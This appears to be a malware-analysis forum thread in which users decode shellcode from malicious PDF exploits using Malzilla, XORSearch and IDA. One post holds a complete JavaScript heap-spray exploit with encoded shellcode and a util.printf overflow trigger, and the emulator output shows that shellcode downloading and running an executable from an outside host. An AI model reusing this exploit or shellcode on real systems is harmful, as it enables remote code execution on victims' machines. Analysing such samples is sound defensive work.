PDF exploit issue

[jimmyleo]

Original pdf exploit file is index.pdf.
I've got the plain stream with bobby's inflater in 3.tmp.
I renamed it as FLevel.txt. and then I decoded it to second level as SLevel.txt.
But I'm confused with following shellcode. How to decode it?
Any thoughts?

[bobby]

Shellcode is XORed with 0xEE.
Here is the download URL from the shellcode after XORing it with 0xEE:
hxxp://79.135.167.18/cgi-bin/index.cgi?fc413c500100f07002123510f6067317db1d02b55afdb30001080400000000170

[jimmyleo]

hi bobby

thnx 4 your help.
how did know the XOR value?
and how can I debug the shellcode?

[SysAdMini]

how did know the XOR value?
and how can I debug the shellcode?

Download xorsearch from http://blog.didierstevens.com/programs/xorsearch/

Save the shellcode in Malzilla.

run "XORSearch.exe -si -l 1000 hexfile.bin http"


or load the shellcode into IDA Pro , disassemble and find the xor value

[jimmyleo]

yep I got it~~

thnx SysAdMini


and I've catched another exploit.

how about this?

there's maybe an ALPHA2 compression level finally?

[sowhat-x]

That's as far I can get for the time being...

Code: [Select]

lemiros=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144%u5856%u5a34%u4238%u4a44%u4d4f%u4e4b%u3142%u354c%u544c%u4343%u4c49%u3648%u4b49%u434e%u5041%u3842%u5346%u504c%u4949%u4e44%u4f4c%u4e4b%u5045%u4e4a%u4e4b%u4f4f%u4f4f%u4f4f%u4742%u544e%u4949%u5949%u3949%u4c43%u4f4d%u534a%u4a49%u3949%u3949%u4949%u3144%u4d49%u4945%u5144%u4e49%u4845%u3346%u5144%u4d49%u5941%u5144%u4441%u4144%u4e4c%u4a45%u4144%u4e4d%u3847%u4e41%u494c%u564c%u3144%u4e47%u4b49%u494c%u4644%u3144%u4d47%u584d%u4a4c%u5746%u4c4f%u4c50%u4c4a%u4144%u4a48%u394c%u5644%u3144%u464b%u4f43%u3947%u4c42%u364c%u434f%u4e4d%u3941%u4c42%u4c48%u314c%u3550%u494d%u4d4e%u374b%u5742%u4c42%u4c48%u4c47%u3144%u4546%u3144%u4d4f%u4b4d%u494c%u454c%u544a%u574a%u394c%u354a%u4a4c%u5542%u4f4f%u3144%u5941%u4144%u4d4f%u4845%u594c%u554c%u354a%u574a%u494b%u494c%u554a%u4144%u3949%u394c%u454c%u5144%u5643%u4144%u3650%u414c%u354f%u5947%u4144%u4449%u4f43%u594d%u4c42%u4741%u4c49%u5949%u3949%u4949%u414c%u554f%u4946%u4c4b%u4c4f%u4648%u4c50%u4645%u4c43%u4144%u3441%u4f43%u494a%u4c42%u5741%u4a46%u4949%u5949%u5949%u514c%u354f%u484c%u4c4f%u4d4f%u5149%u4a47%u5149%u4e4e%u3643%u3149%u4a4f%u5149%u4c47%u514c%u5745%u4b49%u4144%u5445%u4f43%u4b49%u4c4c%u4648%u4c50%u5745%u5550%u494d%u594c%u4c45%u4f4a%u4b47%u4f4e%u4550%u4d4d%u394c%u394d%u4e41%u4f4e%u3949%u3949%u4a4c%u4549%u4c49%u4c49%u4c4c%u4c4f%u4c49%u4648%u4c50%u4645%u5144%u3445%u4c49%u4c4c%u3648%u4c50%u3649%u4c49%u3648%u4c50%u564d%u4a4c%u5549%u4345%u314e%u3549%u4e4e%u3642%u4c4a%u4c4b%u4c4f%u4c4c%u3648%u544b%u4c43%u4c42%u5344%u574b%u3747%u4a4c%u4549%u354c%u4741%u4b4f%u4648%u5648%u3648%u4d50%u4f4e%u4e4d%u4c49%u4e4b%u4f48%u4f4c%u4d4a%u4f4d%u4f4d%u4e4b%u4f4e%u4e4c%u4e4c%u3949%u4d50%u4f4e%u4e4d%u4c4c%u4e42%u4e4c%u4e4d%u4f4e%u4f46%u4d4d%u4f42%u4e4b%u4f4e%u4f4c%u4e4d%u4f48%u4e4b%u4e42%u4d4a%u4949%u4c50%u4f42%u4f47%u4d4e%u4e41%u4f4e%u4f4c%u5949%u4d4e%u4e41%u4f42%u4e4d%u4c4d%u4f41%u4e4b%u4f4e%u4f4a%u4f4d%u5949%u4d45%u4f48%u4f4a%u4f4d%u4d45%u4f42%u4f4b%u4e4b%u4f4a%u4e4b%u4e42%u4d4a%u5949%u4e4e%u4e4b%u4f45%u4f46%u4f48%u4f47%u3949%u4c4e%u4c4b%u4d45%u4d4d%u4f48%u4e50%u4f47%u4f45%u4f48%u4f4a%u4f4d%u4c4d%u4f48%u4d4f%u4f42%u4f45%u4f4e%u4d4a%u3949%u364a%u3746%u4746%u4742%u334c%u524f%u424f%u3644%u3645%u4743%u364a%u4744%u5641%u3647%u364f%u3743%u4250%u3643%u364f%u364d%u524f%u5747%u464f%u5744%u464b%u424f%u4647%u4645%u5746%u3645%u374a%u4645%u5250%u5742%u464a%u4742%u534f%u364a%u434d%u3343%u3341%u4842%u005a");
 var nades=unescape("%u0A0A%u0A0A");
 var makofamos=20;
 var nanor=makofamos+lemiros.length;
 while(nades.length<nanor)nades+=nades;
 var fadad=nades.substring(0,nanor);
 var lusibirasa=nades.substring(0,nades.length-nanor);
 while(lusibirasa.length+nanor<0x60000)lusibirasa=lusibirasa+lusibirasa+fadad;
 var vatekere=new Array();
 for(vener9=0;vener9<1200;vener9++)
 {
   vatekere[vener9]=lusibirasa+lemiros
 }
 var kekifidu1=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
 util.printf("%45000f",kekifidu1);

[SysAdMini]

how about this?

there's maybe an ALPHA2 compression level finally?

It's not simply xor encoded. Load it into IDA and you will see the algorithm.

But if you only wanna know what is does, then run it in Malzilla's shellcode analyzer.
Here ist the output.

Code: [Select]

verbose = 0
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(32)
stepcount 13829
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x0041714e =>
           = "GetSystemDirectoryA";
) = 0x7c814eea;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417162 =>
           = "WinExec";
) = 0x7c86136d;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x0041716a =>
           = "ExitThread";
) = 0x7c80c058;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417175 =>
           = "LoadLibraryA";
) = 0x7c801d77;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417182 =>
           = "urlmon";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
     LPCSTR lpProcName = 0x00417189 =>
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
     LPTSTR lpBuffer = 0x0012fe74 =>
         none;
     UINT uSize = 32;
) =  19;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x0041719c =>
           = "http://beshragos.com/work/getexe.php?h=31";
     LPCTSTR szFileName = 0x0012fe74 =>
           = "c:\WINDOWS\system32\a.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0012fe74 =>
           = "c:\WINDOWS\system32\a.exe";
     UINT uCmdShow = 0;
) =  32;
void ExitThread (
     DWORD dwExitCode = 32;
) =  0;

Finished


[sowhat-x]

* sowhat-x thinks I got eventually...thanks to bobby and Malzilla's libemu bindings,he-he...  

Code: [Select]

hxxp://beshragos.com/work/getexe.php?h=31

[sowhat-x]

Lmao - now that's what I call synchronization! 

[SysAdMini]

Lmao - now that's what I call synchronization! 

Nice. Same answer within 10 seconds

[sowhat-x]

Lol,got kinda confused with it...exactly what you said:
was testing different xor keys,until something kinda recognizable gets returned...
and when i understood this certainly couldn't be the case,i decided to go for the...
libemu one-click solution,he-he 

[bobby]

There are a couple of shellcodes where Malzilla's Shellcode analyzer can't help.
In such case, copy the shellcode to HexView page and click on Disassemble.
Scroll down the disassembled content, and see if there is a error message.
If there is one, saying that there is an unexpected byte at some address, it means that from that address on there is a content that need to be decoded (e.g. XOR).
Scroll the disassembled content and search for first occurrence of XOR instruction, e.g. XOR [EPB], AL.
If XOR is using AL for XOR key, search what is put in AL. In most of the cases, just a couple of instructions before XOR, you should see an instruction which put something in AL (e.g. MOV AL, 0x000000EE). Now you got the XOR key.

Malzilla can do XOR decoding (HexView tab).

As for now, it can't do other operations that are also used for encrypting (ROR, ROL, ADD, SUB etc.)

[sowhat-x]

Scroll down the disassembled content, and see if there is a error message.
If there is one, saying that there is an unexpected byte at some address,
it means that from that address on there is a content that need to be decoded (e.g. XOR).

Oh,that explains it now...doh,i'm an idiot,i thought that this error code,
was some kind of internal limitation of the disasm engine or something... 

[bobby]

Scroll down the disassembled content, and see if there is a error message.
If there is one, saying that there is an unexpected byte at some address,
it means that from that address on there is a content that need to be decoded (e.g. XOR).

Oh,that explains it now...doh,i'm an idiot,i thought that this error code,
was some kind of internal limitation of the disasm engine or something... 

You will get same error message in that case too.
Unfortunately, I use some older version of libdisassm - 0.21-pre1 ( http://bastard.sourceforge.net/libdisasm.html ), as there is no newer Pascal port of it.
I can update it, but now I have some more important items on Malzilla's ToDo list (working on Malzilla 2.0 - total rewrite of the engine, based on real DOM parser, which means that we wouldn't need Kalimero anymore, as Malzilla will know how to deal with e.g. GetElementById etc.)

[jimmyleo]

long time no see~~ sowhat-x

I've also got some error message from shellcode analyser as following:

Code: [Select]

verbose = 0
cpu error error accessing 0x42363501 not mapped

stepcount 16

Finished
and XORSearch & Malzilla's HexView are good for finding XOR value~~